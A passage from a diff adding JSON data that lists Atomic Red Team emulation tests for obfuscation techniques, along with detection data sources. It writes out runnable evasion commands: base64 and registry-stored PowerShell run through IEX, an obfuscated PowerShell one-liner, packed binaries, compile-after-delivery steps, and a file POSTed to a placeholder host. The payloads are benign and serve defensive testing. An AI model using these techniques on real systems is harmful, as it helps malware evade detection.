}, + { + "command": "cp PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed /tmp/packed_bin && /tmp/packed_bin\n", + "source": "atomics/T1027.002/T1027.002.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Software Packing" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1027.002", + "display_name": "Obfuscated Files or Information: Software Packing", + "atomic_tests": [ + { + "name": "Binary simply packed by UPX (linux)", + "auto_generated_guid": "11c46cd8-e471-450e-acb8-52a1216ae6a4", + "description": "Copies and then runs a simple binary (just outputting \"the cake is a lie\"), that was packed by UPX.\nNo other protection/compression were applied.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "bin_path": { + "description": "Packed binary", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.002/bin/linux/test_upx" + } + }, + "executor": { + "command": "cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin\n", + "cleanup_command": "rm /tmp/packed_bin\n", + "name": "sh" + } + }, + { + "name": "Binary packed by UPX, with modified headers (linux)", + "auto_generated_guid": "f06197f8-ff46-48c2-a0c6-afc1b50665e1", + "description": "Copies and then runs a simple binary (just outputting \"the cake is a lie\"), that was packed by UPX.\n\nThe UPX magic number (`0x55505821`, \"`UPX!`\") was changed to (`0x4c4f5452`, \"`LOTR`\"). 
This prevents the binary from being detected\nby some methods, and especially UPX is not able to uncompress it any more.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "bin_path": { + "description": "Packed binary", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed" + } + }, + "executor": { + "command": "cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin\n", + "cleanup_command": "rm /tmp/packed_bin\n", + "name": "sh" + } + }, + { + "name": "Binary simply packed by UPX", + "auto_generated_guid": "b16ef901-00bb-4dda-b4fc-a04db5067e20", + "description": "Copies and then runs a simple binary (just outputting \"the cake is a lie\"), that was packed by UPX.\nNo other protection/compression were applied.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "bin_path": { + "description": "Packed binary", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.002/bin/darwin/test_upx" + } + }, + "executor": { + "command": "cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin\n", + "cleanup_command": "rm /tmp/packed_bin\n", + "name": "sh" + } + }, + { + "name": "Binary packed by UPX, with modified headers", + "auto_generated_guid": "4d46e16b-5765-4046-9f25-a600d3e65e4d", + "description": "Copies and then runs a simple binary (just outputting \"the cake is a lie\"), that was packed by UPX.\n\nThe UPX magic number (`0x55505821`, \"`UPX!`\") was changed to (`0x4c4f5452`, \"`LOTR`\"). 
This prevents the binary from being detected\nby some methods, and especially UPX is not able to uncompress it any more.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "bin_path": { + "description": "Packed binary", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed" + } + }, + "executor": { + "command": "cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin\n", + "cleanup_command": "rm /tmp/packed_bin\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1027.004", + "command_list": [ + "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Windows\\Temp\\T1027.004.exe #{input_file}\n", + "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:#{output_file} PathToAtomicsFolder\\T1027.004\\src\\calc.cs\n", + "Invoke-Expression PathToAtomicsFolder\\T1027.004\\bin\\T1027.004_DynamicCompile.exe\n", + "gcc PathToAtomicsFolder/T1027.004/src/T1027-004-test.c && ./a.out\nclang PathToAtomicsFolder/T1027.004/src/T1027-004-test.c && ./a.out\n", + "g++ PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc && ./a.out\nclang++ PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc && ./a.out\n", + "go run PathToAtomicsFolder/T1027.004/src/T1027-004-test.go\n" + ], + "commands": [ + { + "command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Windows\\Temp\\T1027.004.exe #{input_file}\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + }, + { + "command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:#{output_file} PathToAtomicsFolder\\T1027.004\\src\\calc.cs\n", + "source": 
"atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + }, + { + "command": "Invoke-Expression PathToAtomicsFolder\\T1027.004\\bin\\T1027.004_DynamicCompile.exe\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + }, + { + "command": "gcc PathToAtomicsFolder/T1027.004/src/T1027-004-test.c && ./a.out\nclang PathToAtomicsFolder/T1027.004/src/T1027-004-test.c && ./a.out\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + }, + { + "command": "g++ PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc && ./a.out\nclang++ PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc && ./a.out\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + }, + { + "command": "go run PathToAtomicsFolder/T1027.004/src/T1027-004-test.go\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1027.004", + "display_name": "Obfuscated Files or Information: Compile After Delivery", + "atomic_tests": [ + { + "name": "Compile After Delivery using csc.exe", + "auto_generated_guid": "ffcdbd6a-b0e8-487d-927a-09127fe9a206", + "description": "Compile C# code using csc.exe binary used by .NET\nUpon execution an exe named T1027.004.exe will be placed in the temp folder\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Output compiled binary", + "type": "Path", + "default": "C:\\Windows\\Temp\\T1027.004.exe" + }, + "input_file": { + "description": "C# code that launches calc.exe from a hidden cmd.exe Window", + "type": "Path", + "default": 
"PathToAtomicsFolder\\T1027.004\\src\\calc.cs" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "C# file must exist on disk at specified location (#{input_file})\n", + "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs\" -OutFile \"#{input_file}\"\n" + } + ], + "executor": { + "command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:#{output_file} #{input_file}\n", + "cleanup_command": "del #{output_file} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Dynamic C# Compile", + "auto_generated_guid": "453614d8-3ba6-4147-acc0-7ec4b3e1faef", + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process. \nCertain processes are not typically observed compiling C# code, but can do so without touching disk. 
This can be used to unpack a payload for execution.\nThe exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.\nUpon execution, the exe will print 'T1027.004 Dynamic Compile'.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "exe program containing dynamically compiled C# code", + "type": "Path", + "default": "PathToAtomicsFolder\\T1027.004\\bin\\T1027.004_DynamicCompile.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "exe file must exist on disk at specified location (#{input_file})\n", + "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file}\n" + } + ], + "executor": { + "command": "Invoke-Expression #{input_file}\n", + "name": "powershell" + } + }, + { + "name": "C compile", + "auto_generated_guid": "d0377aa6-850a-42b2-95f0-de558d80be57", + "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_file": { + "description": "source file", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.004/src/T1027-004-test.c" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "the source file must exist on disk at specified location (#{input_file})\n", + "prereq_command": "if [ -e #{input_file} ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -O #{input_file}\n" + } + ], + "executor": { + "command": "gcc #{input_file} && ./a.out\nclang #{input_file} && ./a.out\n", + "name": "bash" + } + }, + { + 
"name": "CC compile", + "auto_generated_guid": "da97bb11-d6d0-4fc1-b445-e443d1346efe", + "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_file": { + "description": "source file", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "the source file must exist on disk at specified location (#{input_file})\n", + "prereq_command": "if [ -e #{input_file} ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.cc -O #{input_file}\n" + } + ], + "executor": { + "command": "g++ #{input_file} && ./a.out\nclang++ #{input_file} && ./a.out\n", + "name": "bash" + } + }, + { + "name": "Go compile", + "auto_generated_guid": "78bd3fa7-773c-449e-a978-dc1f1500bc52", + "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_file": { + "description": "source file", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.004/src/T1027-004-test.go" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "the source file must exist on disk at specified location (#{input_file})\n", + "prereq_command": "if [ -e #{input_file} ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.go -O #{input_file}\n" + } + ], + "executor": { + "command": "go run #{input_file}\n", + "name": "bash" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1027", + "command_list": [ + "sh -c \"echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat\"\ncat /tmp/encoded.dat | base64 -d > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", + "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand\n", + "$OriginalCommand = '#{powershell_command}'\n$Bytes = 
[System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name #{registry_entry_storage} -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion #{registry_entry_storage}).#{registry_entry_storage})))\"\n", + "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))\"\n", + "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))\"\n", + "\"%temp%\\temp_T1027.zip\\T1027.exe\"\n", + "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From test@corp.com -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From #{sender} -To test@corp.com -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} 
-SmtpServer 127.0.0.1\n", + "Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm\n", + "Invoke-WebRequest -Uri 127.0.0.1 -Method POST -Body #{input_file}\n", + "$cmDwhy =[TyPe](\"{0}{1}\" -f 'S','TrING') ; $pz2Sb0 =[TYpE](\"{1}{0}{2}\"-f'nv','cO','ert') ; &(\"{0}{2}{3}{1}{4}\" -f'In','SiO','vOKe-EXp','ReS','n') ( (&(\"{1}{2}{0}\"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y')).\"v`ALUe\"::(\"{1}{0}\" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::\"t`OinT`16\"(( [sTring]${_}) ,8)))})) )\n", + "[a-z0-9]{1}.exe", + "*.exe \\*.exe\\:Zone.Identifier:$DATA\" " + ], + "commands": [ + { + "command": "sh -c \"echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat\"\ncat /tmp/encoded.dat | base64 -d > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name #{registry_entry_storage} -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion 
#{registry_entry_storage}).#{registry_entry_storage})))\"\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))\"\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))\"\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "\"%temp%\\temp_T1027.zip\\T1027.exe\"\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Send-MailMessage -From test@corp.com -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "source": 
"atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Send-MailMessage -From #{sender} -To test@corp.com -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer 127.0.0.1\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Invoke-WebRequest -Uri 127.0.0.1 -Method POST -Body #{input_file}\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "$cmDwhy =[TyPe](\"{0}{1}\" -f 'S','TrING') ; $pz2Sb0 =[TYpE](\"{1}{0}{2}\"-f'nv','cO','ert') ; &(\"{0}{2}{3}{1}{4}\" -f'In','SiO','vOKe-EXp','ReS','n') ( (&(\"{1}{2}{0}\"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y')).\"v`ALUe\"::(\"{1}{0}\" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::\"t`OinT`16\"(( [sTring]${_}) ,8)))})) )\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "[a-z0-9]{1}.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "*.exe \\*.exe\\:Zone.Identifier:$DATA\" ", + "source": "Threat Hunting Tables", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1027", + 
"display_name": "Obfuscated Files or Information", + "atomic_tests": [ + { + "name": "Decode base64 Data into Script", + "auto_generated_guid": "f45df6be-2e1e-4136-a384-8f18ab3826fb", + "description": "Creates a base64-encoded data file and decodes it into an executable shell script\n\nUpon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "sh -c \"echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat\"\ncat /tmp/encoded.dat | base64 -d > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", + "name": "sh" + } + }, + { + "name": "Execute base64-encoded PowerShell", + "auto_generated_guid": "a50d5a97-2531-499e-a1de-5544c74432c6", + "description": "Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.\n\nUpon successful execution, powershell will execute an encoded command and stdout default is \"Write-Host \"Hey, Atomic!\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "powershell_command": { + "description": "PowerShell command to encode", + "type": "String", + "default": "Write-Host \"Hey, Atomic!\"" + } + }, + "executor": { + "command": "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand\n", + "name": "powershell" + } + }, + { + "name": "Execute base64-encoded PowerShell from Windows Registry", + "auto_generated_guid": "450e7218-7915-4be4-8b9b-464a49eafcec", + "description": "Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. 
This is used by numerous adversaries and malicious tools.\n\nUpon successful execution, powershell will execute encoded command and read/write from the registry.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "registry_key_storage": { + "description": "Windows Registry Key to store code", + "type": "String", + "default": "HKCU:Software\\Microsoft\\Windows\\CurrentVersion" + }, + "powershell_command": { + "description": "PowerShell command to encode", + "type": "String", + "default": "Write-Host \"Hey, Atomic!\"" + }, + "registry_entry_storage": { + "description": "Windows Registry entry to store code under key", + "type": "String", + "default": "Debug" + } + }, + "executor": { + "command": "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))\"\n", + "cleanup_command": "Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}\n", + "name": "powershell" + } + }, + { + "name": "Execution from Compressed File", + "auto_generated_guid": "f8c8a909-5f29-49ac-9244-413936ce6d1f", + "description": "Mimic execution of compressed executable. 
